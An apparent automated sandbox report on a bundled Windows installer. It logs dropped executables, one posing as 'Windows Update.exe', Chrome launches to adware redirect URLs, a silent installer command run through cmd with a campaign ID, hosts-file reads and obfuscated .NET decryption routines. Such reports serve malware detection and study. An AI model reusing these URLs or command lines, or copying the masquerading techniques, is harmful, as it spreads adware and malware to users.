Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process created: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe "C:\Program Files (x86)\windows multimedia platform\Windows Update.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,9627623661114225042,16842326924946872670,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k C:\Users\user\AppData\Local\Temp\uau4vlym.1bx\installer.exe /qn CAMPAIGN="654" & exit
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,16917623383291386263,6472938917553362493,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1856 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,6457543823163007411,15253291914772866949,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1728 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,10546296038144766013,8885457530477492480,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1852 /prefetch:8
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe"
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process created: C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe "C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,5678826982049071516,1403594556980502964,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1860 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		0_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		1_2_0045568C

Source: C:\Users\user\Desktop\1nJGU59JPU.exe

File created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Code function: 1_2_00455EB4 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,

1_2_00455EB4

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files (x86)\i-record\I-Record.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Program Files (x86)\i-record\I-Record.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Program Files (x86)\i-record\I-Record.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: 1nJGU59JPU.exe

String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t

Source: 7((_8888YTR(.exe.1.dr, gN16lDiQ689Jf9LG4Z/T8FSJJmk2Z6GIYPFJG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7((_8888YTR(.exe.1.dr, HwdMKZof3vOIIGmERY/HgvKc9CgA75M7Y0PoO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7((_8888YTR(.exe.1.dr, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7((_8888YTR(.exe.1.dr, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	Cryptographic APIs: 'CreateDecryptor'
Source: ZHunuhebaqu.exe.3.dr, art_designers_deviantart_network_platform/hand__134d8bc4_5a96_40c9_89df_ad889dad771e__Damn_SHit.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Vahutuqeke.exe.3.dr, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Vahutuqeke.exe.3.dr, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Vahutuqeke.exe.3.dr, qO3Fdlb2uohPYAG9Qh/jl3wwsHvdEsjDuCKvE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, gN16lDiQ689Jf9LG4Z/T8FSJJmk2Z6GIYPFJG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HwdMKZof3vOIIGmERY/HgvKc9CgA75M7Y0PoO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Directory created: C:\Program Files\internet explorer\ROOKKLCFJB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Directory created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Directory created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe.config	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic

Source: 1nJGU59JPU.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: updater.pdbh source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp
Source:	Binary string: Publisher.pdbX source: 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp
Source:	Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb4 source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp, 7((_8888YTR(.exe, 00000003.00000002.324331336.0000000012C05000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.331817003.000000001B560000.00000004.00020000.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp, ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\widgets\I-record\JetScreenRecorder\obj\Release\I-Record.pdb source: I-Record.exe, 00000016.00000000.346453138.00000000007CA000.00000002.00020000.sdmp
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\widgets\I-record\JetScreenRecorder\obj\Release\I-Record.pdb` source: I-Record.exe, 00000016.00000000.346453138.00000000007CA000.00000002.00020000.sdmp
Source:	Binary string: Recover.pdbh> source: ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdb,"nbreDay": source: 7((_8888YTR(.exe, 00000003.00000002.324111810.0000000002E1A000.00000004.00000001.sdmp
Source:	Binary string: Recover.pdb source: ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp, Windows Update.exe
Source:	Binary string: I-Record.pdb8 source: 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp
Source:	Binary string: updater.pdb source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp
Source:	Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: 7((_8888YTR(.exe, 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp, 7((_8888YTR(.exe, 00000003.00000002.324331336.0000000012C05000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.331817003.000000001B560000.00000004.00020000.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp, ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp, Windows Update.exe
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdbF source: 7((_8888YTR(.exe, 00000003.00000002.324177929.0000000002E4A000.00000004.00000001.sdmp
Source:	Binary string: I-Record.pdb source: 7((_8888YTR(.exe, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdb source: ZHunuhebaqu.exe, ZHunuhebaqu.exe, 00000014.00000002.361743821.0000000000512000.00000002.00020000.sdmp
Source:	Binary string: e:\mydev\inno-download-plugin\ansi\idp.pdb source: 1nJGU59JPU.tmp, 00000001.00000002.336506814.000000000018F000.00000004.00000001.sdmp
Source:	Binary string: Publisher.pdb source: 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)

